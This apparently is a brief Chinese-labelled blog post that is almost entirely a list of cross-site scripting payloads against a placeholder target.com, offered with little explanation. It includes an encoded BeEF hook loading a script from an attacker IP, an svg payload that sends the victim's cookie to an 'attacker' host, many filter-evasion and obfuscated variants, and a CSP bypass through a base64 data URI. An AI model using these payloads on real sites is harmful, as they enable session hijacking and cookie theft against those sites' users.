test2

nickqq
183 阅读1分钟
<target.com>/#<img/src/onerror=alert("XSS")> beef的hook,urlencode <target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))> #<img/src="1"/onerror=alert(1)> #><img src=x onerror=prompt(1);> <svg onload=fetch("//attacker/r.php?="%2Bcookie)> <img alt="<a href="onclick=alert(4)//" src=x>">s</a> <details/open/ontoggle="a=alert;a`1`"> <details/open/ontoggle="a=eval,b=alert,c=b`1`,a`b`"> > <svg / on </ script> load = alert`1`> > <svg / on </ script> load = alert(1)> <d3"<"/onclick="1>[confirm``]"<">z 绕过():setTimeout`alert\x28document.domain\x29` "-prompt`1` - "// Input Image <INPUT SRC=”javascript:alert(‘XSS’);”> BODY Image <BODY BACKGROUND=”javascript:alert(‘XSS’)”> BODY标签 <BODY(‘XSS’)> IMG Dynsrc <IMG DYNSRC=”javascript:alert(‘XSS’)”> 换码过滤的JavaScript \";alert('XSS');// 无结束脚本标记(仅火狐等浏览器) <SCRIPT SRC=http://3w.org/XSS/xss.js?<B> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> Spaces和meta前的IMG标签 <IMG SRC=” javascript:alert(‘XSS’);”> 半开的HTML/JavaScript XSS <IMG SRC=”javascript:alert(‘XSS’)” 双开角括号 <iframe src=http://3w.org/XSS.html < 无单引号、双引号、分号 <SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> <BODY BACKGROUND=”javascript:alert(‘XSS’)”> svg/onload'-alert(1)-' <details/open/ontoggle="a=eval,b=alert,c=b`1`,a`b`"> eval(atob('YWxlcnQoMSk=')) <iMg SrC=x OnErRoR=alert(1)> <div onmouseover="alert('XSS');"> </Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm(document.domain)> x@x.com<--`<img/src=` onerror=alert(1)> --!> ""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]][(''+{})[5]+(''+{})[1]+((""[(!1+"")[3]+(!0+"")[2]+(''+{})[2]])+"")[2]+(!1+'')[3]+(!0+'')[0]+(!0+'')[1]+(!0+'')[2]+(''+{})[5]+(!0+'')[0]+(''+{})[1]+(!0+'')[1]](((!1+"")[1]+(!1+"")[2]+(!0+"")[3]+(!0+"")[1]+(!0+"")[0])+"(1)")() oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/o CSP BYPASS script-src self: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>


avatar
文章
阅读
粉丝